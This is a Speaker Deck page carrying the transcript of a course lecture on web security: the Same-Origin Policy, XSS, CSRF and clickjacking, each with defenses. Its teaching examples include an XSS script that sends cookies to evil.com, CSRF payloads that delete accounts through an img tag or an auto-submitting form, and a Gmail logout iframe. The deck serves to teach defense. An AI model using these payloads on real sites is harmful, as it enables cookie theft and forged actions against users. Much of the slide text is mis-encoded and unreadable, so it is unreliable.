Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Selected Topics on Website Security @ 102-2 CCSP
Search
Johnson Liang
May 29, 2014
Technology
1
420
Selected Topics on Website Security @ 102-2 CCSP
Concept of Same Origin Policy, XSS, CSRF & Clickjacking
Johnson Liang
May 29, 2014
Tweet
Share
More Decks by Johnson Liang
See All by Johnson Liang
Political Promise Tracker 政治承諾追蹤網 g0v-hackath14n 提案
mrorz
0
160
群眾協作的一些事—— 「自經區正反意見比較表」到 「臺北市長選舉承諾一覽表」到 「PPT 政治承諾追蹤網」
mrorz
0
310
Political Promise Tracker 政治承諾追蹤網 g0v-hackath12n 提案
mrorz
0
720
[Thesis Defense] SeeSS: Instant Change Impact Visualization for CSS developers
mrorz
0
230
g0v-hackath10n 提案 -- 2014 台北市長政見比較表
mrorz
0
210
網路及平台服務程式設計及零時政府 @ 創新網路技術推廣說明會
mrorz
0
130
g0v-hackath9n 提案 -- 自經區正反意見比較表
mrorz
0
86
CCSP 2014 期末成果展行前須知
mrorz
0
360
Google Analytics @ 102-2 CCSP
mrorz
0
290
Other Decks in Technology
See All in Technology
【技術書典17】OpenFOAM(自宅で極める流体解析)2次元円柱まわりの流れ
kamakiri1225
0
210
生成AIの強みと弱みを理解して、生成AIがもたらすパワーをプロダクトの価値へ繋げるために実践したこと / advance-ai-generating
cyberagentdevelopers
PRO
1
180
AIを駆使したゲーム開発戦略: 新設AI組織の取り組み / sge-ai-strategy
cyberagentdevelopers
PRO
1
130
[AWS JAPAN 生成AIハッカソン] Dialog の紹介
yoshimi0227
0
150
オニオンアーキテクチャで実現した 本質課題を解決する インフラ移行の実例
hryushm
14
3k
AWSコンテナ本出版から3年経った今、もし改めて執筆し直すなら / If I revise our container book
iselegant
15
4k
Oracle Cloud Infrastructureデータベース・クラウド:各バージョンのサポート期間
oracle4engineer
PRO
27
12k
Oracle Base Database Service 技術詳細
oracle4engineer
PRO
5
49k
話題のGraphRAG、その可能性と課題を理解する
hide212131
4
1.5k
カメラを用いた店内計測におけるオプトインの仕組みの実現 / ai-optin-camera
cyberagentdevelopers
PRO
1
120
大規模データ基盤チームのオンプレTiDB運用への挑戦 / dpu-tidb
cyberagentdevelopers
PRO
1
110
WINTICKETアプリで実現した高可用性と高速リリースを支えるエコシステム / winticket-eco-system
cyberagentdevelopers
PRO
1
190
Featured
See All Featured
GitHub's CSS Performance
jonrohan
1030
460k
The Straight Up "How To Draw Better" Workshop
denniskardys
232
140k
Ruby is Unlike a Banana
tanoku
96
11k
YesSQL, Process and Tooling at Scale
rocio
167
14k
Into the Great Unknown - MozCon
thekraken
31
1.5k
Dealing with People You Can't Stand - Big Design 2015
cassininazir
364
22k
Automating Front-end Workflow
addyosmani
1365
200k
The Illustrated Children's Guide to Kubernetes
chrisshort
48
48k
We Have a Design System, Now What?
morganepeng
50
7.2k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
126
18k
Art, The Web, and Tiny UX
lynnandtonic
296
20k
Designing for humans not robots
tammielis
249
25k
Transcript
Selected Topics on Website Security Concept of Same Origin Policy,
XSS, CSRF & Clickjacking MrOrz, 102-2 CCSP Reference: ⽩白帽⼦子講 Web 安全
খࢿ҆શલি Concept of Same Origin Policy, XSS, CSRF & Clickjacking
MrOrz, 102-2 CCSP Reference: ⽩白帽⼦子講 Web 安全
Same-Origin Policy ಉݯࡦ
ᖣ᧸ث࠷֩৺࠷جຊత҆શޭೳʜʜ 8FCੋݐߏࡏಉݯࡦతجૅ೭্తɻ – 吳翰清 ❝ ❞
Same Origin Different Origin ڋ㘺 Ҹڐ ڈ፤ త౦ ڈ፤ త౦
㑌ݸᖣ᧸ث။ɿ
Same Origin Different Origin ڋ㘺 Ҹڐ ڈ፤ త౦ ڈ፤ త౦
एᔒ༗ಉݯࡦɿ
Same Origin Different Origin ڋ㘺 Ҹڐ ڈ፤ త౦ ڈ፤ త౦
Upon visiting http://evil.mobile.org : $.get(‘http://facebook.com’, {}, function(data){ // 未經允許就得到你的 Facebook 塗鴉牆 }, ‘html’); एᔒ༗ಉݯࡦɿ
https://developer.mozilla.org/zh-TW/docs/JavaScript/Same_origin_policy_for_JavaScript host, port & protocol Same Origin Different Origin
༬ઃڋ㘺ލҬ፤ࢿྉ Լྻҝಛྫ
ಛྫҰɿՄލҬࡌೖࢿݯ೭ඪត • <script> • <img> • <iframe> • <link> •
Javascript 無從讀寫其內容
ಛྫೋɿ$SPTT0SJHJO 3FTPVSDF4IBSJOH $034 • Origin request header • Access-Control-Allow-XXX response
header • Enabling cross-origin ajax, web font, WebGL & canvas
Cross-Site Scripting (XSS)
ࢦ᱆٬ಁաʮ)5.-২ೖʯ篡վྃทɼᎎೖྃ ዱҙతࢦྩߘɼਐҰ㑊ࡏ༻ऀᖣ᧸ท࣌ɼ߇ ੍༻ऀᖣ᧸ثతҰछ߈㐝ɻ – 吳翰清 ❝ ❞
<section class="intro"> <%- user.desc %> </section> Your site : Example
#1 ༻ऀ ༌ೖత)5.-
<section class="intro"> <p>Hello</p> <p>I am Johnson</p> </section> Your site :
Example #1
<section class="intro"> <script type="text/javascript"> $.getJSON('http://evil.com/', { stoken: document.cookie }); </script>
</section> Your site : Example #1 ፨๚ࠑ༻㖽ท໘తਓɼDPPLJF။ඃFWJMDPN䫖
<script type="text/javascript"> var pageTitle = "<%= userPage.title %>"; </script> Your
site : Example #2 ༻ऀࣗ༝༌ೖతࣈ۲
<script type="text/javascript"> var pageTitle = ""; $.getJSON(...); ""; </script> Your
site : Example #2 ፨๚ࠑ༻㖽ท໘తਓɼࢿྉ။ඃ䫖
$.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){ $('h1').html(data.userPageTitle); }); Your site : Example #3
༻ऀࣗ༝༌ೖతࣈ۲ <h1>Welcome to my page!</h1>
$.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){ $('h1').html(data.userPageTitle); }); Your site : Example #3
༻ऀࣗ༝༌ೖతࣈ۲ <h1>Welcome to my page!<script>$.getJSON('http://evil.com',...);</script></h1>
Ṝछ߈㐝తࣔൣҊྫੋލҬతɼॴҎڣ z$SPTTz 4JUF 4DSJQUJOHɻᚙల౸ࠓఱɼੋ൱ލҬቮៃෆ ࠶ॏཁɼ944Ṝݸ໊ࣈჟҰอཹྃԼိɻ – 吳翰清 ❝ ❞
ڔํࣜ 防⽌止 Cookie 盜⽤用:HttpOnly res.cookie('key', 'value', { httpOnly: true });
༬ઃଖመबੋUSVF
ڔํࣜ 防⽌止 Cookie 盜⽤用:HttpOnly res.cookie('key', 'value', { httpOnly: true });
༬ઃଖመबੋUSVF
ڔํࣜ HTML 輸出檢查 — 盡量不⽤用 <%- %> <section class="intro"> <%=
user.desc %> </section>
ڔํࣜ HTML 輸出檢查 — Caja-HTML-Sanitizer // Controller ! var sanitizer
= require('sanitizer'); sanitizedIntro = sanitizer.sanitize(user.desc); ! <!-- View --> <section class="intro"> <%- sanitizedIntro %> </section> อཹແత)5.-UBHT
ڔํࣜ Javascript 輸出檢查 — ⽤用現成 JSON.stringify <script type="text/javascript"> var page
= <%- JSON.stringify({ title: userPage.title }) %>; </script>
ڔํࣜ DOM-based XSS — 盡量⽤用 .text(…) 取代 .html(…) 或先 sanitize
想插⼊入的 HTML. $.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){ $('h1').text(data.userPageTitle); });
Cross-Site Request Forgery (CSRF/XSRF)
Your site : Example #4 // Delete current user account
app.get('/user/delete', userCtrl.delete);
evil.com : Example #4 <img src="http://yoursite.com/user/delete"> ፨๚ࠑFWJMTJUFతਓɼ౸ྃ વޙ䭪ʗଞࡏZPVSTJUFDPNతாᥒबല໊ඃ႟ᎃྃ
߈㐝ऀᷮᷮ༠ಋ༻ऀ๚ྃҰݸท໘ɼबҎ֘ ༻ऀతɼࡏZPVSTJUFDPNཫࣥߦྃҰ࣍ૢ ࡞ʜʜṜछ SFRVFTU ੋ߈㐝ऀॴِతɼॴҎ ڣz$SPTTTJUF3FRVFTU'PSHFSZzɻ – 吳翰清 ❝ ❞
<iframe src="https://mail.google.com/mail/u/0/?logout"> Demo:cryptogasm.com/gmail-logout.html
evil.com : Example #5 ፨๚FWJMTJUFޙɼ༻ऀࡏZPVSTJUFDPNతாᥒबല໊ඃ႟ᎃྃ <form action="http://yoursite.com/user/delete" method="post" id="evil-form"> </form>
! <script type="text/javascript"> $('#evil-form').submit(); </script>
ڔํࣜ • CSRF 攻擊成功的要素:request 的所有參數都可以被 攻擊者猜測到。 • Anti-CSRF Token:使攻擊者無法拼湊正確 request。
ڔํࣜ
ڔํࣜ
ڔํࣜ දᄸૹग़ޙɼޙDPOUSPMMFS။ᒾ查දᄸత UPLFOੋ൱ᢛDPPLJFதతUPLFO૬ූɼ एෆҰᒬɼबෆ၏ࣄɻ
ڔํࣜ http://stackoverflow.com/questions/20420762/how-to-enable-csrf-in-express3 // Express settings ! app.use(express.cookieParser('optional secret string')); app.use(express.session());
app.use(express.csrf()); app.use(function (req, res, next) { res.locals.csrftoken = req.csrfToken(); next(); }); ! ! ! <!-- View --> ! <form action="..." method="post"> <input type="hidden" name="_csrf" value="<%= csrftoken %>"> </form> ᩋTFTTJPOཫతBOUJDTSGUPLFO ࡏWJFXཫೳ፤ಘ౸
Clickjacking
Jeremiah Grossman and Robert Hansen, 2008
http://www.crazylearner.org/clickjacking-example/ Copyright 2014 Crazylearner. Fair use
None
ڔํࣜ w ᩋ㟬తෆඃ࠹ਐJGSBNFཫ • x-frame-options: deny w IUUQTHJUIVCDPNFWJMQBDLFUIFMNFU Can’t be
your site!
http://youtu.be/VRCUpXLguHM 吳翰清 著
http://youtu.be/VRCUpXLguHM 吳翰清 著